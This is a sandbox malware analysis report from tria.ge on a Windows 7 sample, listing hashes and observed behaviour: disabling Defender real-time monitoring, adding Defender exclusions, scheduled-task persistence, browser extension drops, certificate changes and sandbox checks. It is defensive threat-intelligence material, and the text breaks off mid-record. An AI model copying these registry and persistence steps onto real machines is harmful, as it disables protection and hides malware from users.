Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
127s -
max time network
131s -
platform
windows7_x64 -
resource
win7-20220812-en -
resource tags
arch:x64arch:x86image:win7-20220812-enlocale:en-usos:windows7-x64system -
submitted
27/10/2022, 16:51
Static task
static1
Behavioral task
behavioral1
Sample
file.exe
Resource
win7-20220812-en
General
-
Target
file.exe
-
Size
7.2MB
-
MD5
7cd4ca0bedb444ad408d61114f7af4ba
-
SHA1
1acf38f5c49906f9c6399b9982a042d2d62eac87
-
SHA256
e4a445576cdb625b8d6b4da226f0a19e6b6a7e85892f88614cdc94eb5140df24
-
SHA512
c4e6f6338ef1b0b3c70056d158fea7f9bb6baee89ccf14d62330bb29173cdf35ed3522389857ca1d37aea584a2d841888e01df38e8608b86187f586e1bb95fb4
-
SSDEEP
196608:91OZ2vY/eUwt9gTHGC6z0IB9GFlKpoKvOYuavElHDuQ/3:3OQ4J0YiYQ9GgmYurlHDRP
Malware Config
Signatures
-
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection\DisableRealtimeMonitoring = "1" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection\DisableRealtimeMonitoring = "1" reg.exe -
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\mlVNeEAaSntXOMWdx = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\TKLYYQlZQscfmQGO = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\pqzHHOUJlDLoC = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\mbQXQWfiU = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\ZsZOnrmVuUzLFCeGJOR = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\yaZvCAUzKqxU2 = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\yaZvCAUzKqxU2 = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\TKLYYQlZQscfmQGO = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\TKLYYQlZQscfmQGO = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\ZsZOnrmVuUzLFCeGJOR = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\mbQXQWfiU = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\TKLYYQlZQscfmQGO = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\LNUBGVQNDOUn = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\ProgramData\NRVKUIgAFoPoXkVB = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\mlVNeEAaSntXOMWdx = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\LNUBGVQNDOUn = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\pqzHHOUJlDLoC = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\ProgramData\NRVKUIgAFoPoXkVB = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe -
Blocklisted process makes network request 1 IoCs
flow pid Process 29 1720 rundll32.exe -
Executes dropped EXE 4 IoCs
pid Process 1116 Install.exe 1628 Install.exe 812 vzXMZqI.exe 1552 xqcOwVf.exe -
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rundll32.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000\Control Panel\International\Geo\Nation xqcOwVf.exe -
Loads dropped DLL 12 IoCs
pid Process 1980 file.exe 1116 Install.exe 1116 Install.exe 1116 Install.exe 1116 Install.exe 1628 Install.exe 1628 Install.exe 1628 Install.exe 1720 rundll32.exe 1720 rundll32.exe 1720 rundll32.exe 1720 rundll32.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Drops Chrome extension 2 IoCs
description ioc Process File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gfcdbodapcbfckbfpmgeldfkkgjknceo\1.2.0_0\manifest.json xqcOwVf.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\meejmcfbiapijdfaadackoblffmidlig\1.0.0.0\manifest.json xqcOwVf.exe -
Drops file in System32 directory 23 IoCs
description ioc Process File opened for modification C:\Windows\system32\GroupPolicy\Machine\Registry.pol vzXMZqI.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\A16C6C16D94F76E0808C087DFC657D99_A49E2928C282F3D7B74BA1083F81B152 xqcOwVf.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\A16C6C16D94F76E0808C087DFC657D99_A49E2928C282F3D7B74BA1083F81B152 xqcOwVf.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\265C0DEB29181DD1891051371C5F863A_7D7374C3BD488A38BC34DD9B008EDC62 xqcOwVf.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\265C0DEB29181DD1891051371C5F863A_7987E17ED77D800093D5BF3096E78D98 xqcOwVf.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\265C0DEB29181DD1891051371C5F863A_7987E17ED77D800093D5BF3096E78D98 xqcOwVf.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\counters.dat rundll32.exe File created C:\Windows\system32\GroupPolicy\gpt.ini Install.exe File created C:\Windows\system32\GroupPolicy\Machine\Registry.pol vzXMZqI.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.EXE File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B398B80134F72209547439DB21AB308D_A4CF52CCA82D7458083F7280801A3A04 xqcOwVf.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B398B80134F72209547439DB21AB308D_A4CF52CCA82D7458083F7280801A3A04 xqcOwVf.exe File opened for modification C:\Windows\system32\GroupPolicy\gpt.ini vzXMZqI.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.EXE File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA xqcOwVf.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA xqcOwVf.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA xqcOwVf.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\265C0DEB29181DD1891051371C5F863A_7D7374C3BD488A38BC34DD9B008EDC62 xqcOwVf.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.EXE File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.EXE File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\counters.dat xqcOwVf.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA xqcOwVf.exe File opened for modification C:\Windows\system32\GroupPolicy\Machine\Registry.pol xqcOwVf.exe -
Drops file in Program Files directory 13 IoCs
description ioc Process File created C:\Program Files (x86)\ZsZOnrmVuUzLFCeGJOR\VSHiTSx.xml xqcOwVf.exe File created C:\Program Files (x86)\pqzHHOUJlDLoC\SMjlREb.dll xqcOwVf.exe File created C:\Program Files\Mozilla Firefox\browser\omni.ja.bak xqcOwVf.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\omni.ja xqcOwVf.exe File created C:\Program Files (x86)\mbQXQWfiU\ONCvIzB.xml xqcOwVf.exe File created C:\Program Files (x86)\yaZvCAUzKqxU2\keevExSFaWuPM.dll xqcOwVf.exe File created C:\Program Files (x86)\yaZvCAUzKqxU2\FUQPhRZ.xml xqcOwVf.exe File created C:\Program Files (x86)\LNUBGVQNDOUn\uDBZAzL.dll xqcOwVf.exe File created C:\Program Files (x86)\mbQXQWfiU\evxFWP.dll xqcOwVf.exe File created C:\Program Files\Mozilla Firefox\browser\features\{469DEDC5-791B-41B7-99CA-EB25B08298D1}.xpi xqcOwVf.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\features\{469DEDC5-791B-41B7-99CA-EB25B08298D1}.xpi xqcOwVf.exe File created C:\Program Files (x86)\ZsZOnrmVuUzLFCeGJOR\waHdiqA.dll xqcOwVf.exe File created C:\Program Files (x86)\pqzHHOUJlDLoC\chxTLJi.xml xqcOwVf.exe -
Drops file in Windows directory 4 IoCs
description ioc Process File created C:\Windows\Tasks\VifYLfsFUZBOnFr.job schtasks.exe File created C:\Windows\Tasks\WxeKxhacHpvHIAGHf.job schtasks.exe File created C:\Windows\Tasks\bvlIjxbhjqoskMIGsW.job schtasks.exe File created C:\Windows\Tasks\JApWNoHZsVVCavdbE.job schtasks.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Creates scheduled task(s) 1 TTPs 13 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 2044 schtasks.exe 1572 schtasks.exe 1780 schtasks.exe 916 schtasks.exe 960 schtasks.exe 2024 schtasks.exe 1748 schtasks.exe 308 schtasks.exe 1412 schtasks.exe 1612 schtasks.exe 1040 schtasks.exe 968 schtasks.exe 912 schtasks.exe -
Enumerates system info in registry 2 TTPs 4 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName Install.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS rundll32.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName rundll32.exe -
Modifies data under HKEY_USERS 64 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft wscript.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows Script Host wscript.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad xqcOwVf.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\DefaultConnectionSettings = 4600000003000000090000000000000000000000000000000400000000000000000000000000000000000000000000000000000001000000020000000a7f0089000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 xqcOwVf.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix rundll32.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\c2-5a-4e-28-52-a9 rundll32.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\c2-5a-4e-28-52-a9 xqcOwVf.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed xqcOwVf.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed xqcOwVf.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust xqcOwVf.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:" rundll32.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\c2-5a-4e-28-52-a9\WpadDecisionReason = "1" xqcOwVf.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\c2-5a-4e-28-52-a9\WpadDecisionTime = f018535935ead801 xqcOwVf.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\Certificates xqcOwVf.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings rundll32.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ wscript.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0" xqcOwVf.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing xqcOwVf.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople xqcOwVf.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing wscript.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections xqcOwVf.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CRLs xqcOwVf.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople xqcOwVf.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust xqcOwVf.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyEnable = "0" rundll32.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows Script Host\Settings wscript.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix xqcOwVf.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings xqcOwVf.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CTLs xqcOwVf.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot xqcOwVf.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\CTLs xqcOwVf.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates xqcOwVf.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections rundll32.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0" wscript.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix = "Cookie:" xqcOwVf.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings = 4600000002000000090000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 xqcOwVf.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{320FAE8C-65E3-4AC8-A168-319E067B685E}\WpadDecision = "0" xqcOwVf.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{320FAE8C-65E3-4AC8-A168-319E067B685E}\c2-5a-4e-28-52-a9 xqcOwVf.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\CA\Certificates xqcOwVf.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\CTLs xqcOwVf.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Root\CRLs xqcOwVf.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Root\CTLs xqcOwVf.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\CRLs xqcOwVf.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings rundll32.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows Script Host\Settings wscript.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1" xqcOwVf.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA xqcOwVf.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\trust\Certificates xqcOwVf.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 xqcOwVf.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings = 4600000003000000090000000000000000000000000000000400000000000000000000000000000000000000000000000000000001000000020000000a7f0089000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 rundll32.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1" wscript.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings xqcOwVf.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:" xqcOwVf.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyEnable = "0" xqcOwVf.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Root\Certificates xqcOwVf.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\CRLs xqcOwVf.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs xqcOwVf.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\CTLs xqcOwVf.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\My xqcOwVf.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CTLs xqcOwVf.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root xqcOwVf.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\CRLs xqcOwVf.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\trust\CTLs xqcOwVf.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{320FAE8C-65E3-4AC8-A168-319E067B685E} xqcOwVf.exe -
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436 xqcOwVf.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436\Blob = 04000000010000001000000079e4a9840d7d3a96d7c04fe2434c892e0f0000000100000014000000b34ddd372ed92e8f2abfbb9e20a9d31f204f194b090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030814000000010000001400000003de503556d14cbb66f0a3e21b1bc397b23dd1550b00000001000000120000004400690067006900430065007200740000001d000000010000001000000059779e39e21a2e3dfced6857ed5c5fd9030000000100000014000000a8985d3a65e5e5c4b2d7d66d40c6dd2fb19c54361900000001000000100000000f3a0527d242de2dc98e5cfcb1e991ee2000000001000000b3030000308203af30820297a0030201020210083be056904246b1a1756ac95991c74a300d06092a864886f70d01010505003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100e23be11172dea8a4d3a357aa50a28f0b7790c9a2a5ee12ce965b010920cc0193a74e30b753f743c46900579de28d22dd870640008109cece1b83bfdfcd3b7146e2d666c705b37627168f7b9e1e957deeb748a308dad6af7a0c3906657f4a5d1fbc17f8abbeee28d7747f7a78995985686e5c23324bbf4ec0e85a6de370bf7710bffc01f685d9a844105832a97518d5d1a2be47e2276af49a33f84908608bd45fb43a84bfa1aa4a4c7d3ecf4f5f6c765ea04b37919edc22e66dce141a8e6acbfecdb3146417c75b299e32bff2eefad30b42d4abb74132da0cd4eff881d5bb8d583fb51be84928a270da3104ddf7b216f24c0a4e07a8ed4a3d5eb57fa390c3af270203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041403de503556d14cbb66f0a3e21b1bc397b23dd155301f0603551d2304183016801403de503556d14cbb66f0a3e21b1bc397b23dd155300d06092a864886f70d01010505000382010100cb9c37aa4813120afadd449c4f52b0f4dfae04f5797908a32418fc4b2b84c02db9d5c7fef4c11f58cbb86d9c7a74e79829ab11b5e370a0a1cd4c8899938c9170e2ab0f1cbe93a9ff63d5e40760d3a3bf9d5b09f1d58ee353f48e63fa3fa7dbb466df6266d6d16e418df22db5ea774a9f9d58e22b59c04023ed2d2882453e7954922698e08048a837eff0d6796016deace80ecd6eac4417382f49dae1453e2ab93653cf3a5006f72ee8c457496c612118d504ad783c2c3a806ba7ebaf1514e9d889c1b9386ce2916c8aff64b977255730c01b24a3e1dce9df477cb5b424080530ec2dbd0bbf45bf50b9a9f3eb980112adc888c698345f8d0a3cc6e9d595956dde xqcOwVf.exe -
Suspicious behavior: EnumeratesProcesses 28 IoCs
pid Process 1080 powershell.EXE 1080 powershell.EXE 1080 powershell.EXE 1620 powershell.EXE 1620 powershell.EXE 1620 powershell.EXE 1424 powershell.EXE 1424 powershell.EXE 1424 powershell.EXE 544 powershell.EXE 544 powershell.EXE 544 powershell.EXE 1552 xqcOwVf.exe 1552 xqcOwVf.exe 1552 xqcOwVf.exe 1552 xqcOwVf.exe 1552 xqcOwVf.exe 1552 xqcOwVf.exe 1552 xqcOwVf.exe 1552 xqcOwVf.exe 1552 xqcOwVf.exe 1552 xqcOwVf.exe 1552 xqcOwVf.exe 1552 xqcOwVf.exe 1552 xqcOwVf.exe 1552 xqcOwVf.exe 1552 xqcOwVf.exe 1552 xqcOwVf.exe -
Suspicious use of AdjustPrivilegeToken 4 IoCs
description pid Process Token: SeDebugPrivilege 1080 powershell.EXE Token: SeDebugPrivilege 1620 powershell.EXE Token: SeDebugPrivilege 1424 powershell.EXE Token: SeDebugPrivilege 544 powershell.EXE -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 1980 wrote to memory of 1116 1980 file.exe 28 PID 1980 wrote to memory of 1116 1980 file.exe 28 PID 1980 wrote to memory of 1116 1980 file.exe 28 PID 1980 wrote to memory of 1116 1980 file.exe 28 PID 1980 wrote to memory of 1116 1980 file.exe 28 PID 1980 wrote to memory of 1116 1980 file.exe 28 PID 1980 wrote to memory of 1116 1980 file.exe 28 PID 1116 wrote to memory of 1628 1116 Install.exe 29 PID 1116 wrote to memory of 1628 1116 Install.exe 29 PID 1116 wrote to memory of 1628 1116 Install.exe 29 PID 1116 wrote to memory of 1628 1116 Install.exe 29 PID 1116 wrote to memory of 1628 1116 Install.exe 29 PID 1116 wrote to memory of 1628 1116 Install.exe 29 PID 1116 wrote to memory of 1628 1116 Install.exe 29 PID 1628 wrote to memory of 268 1628 Install.exe 31 PID 1628 wrote to memory of 268 1628 Install.exe 31 PID 1628 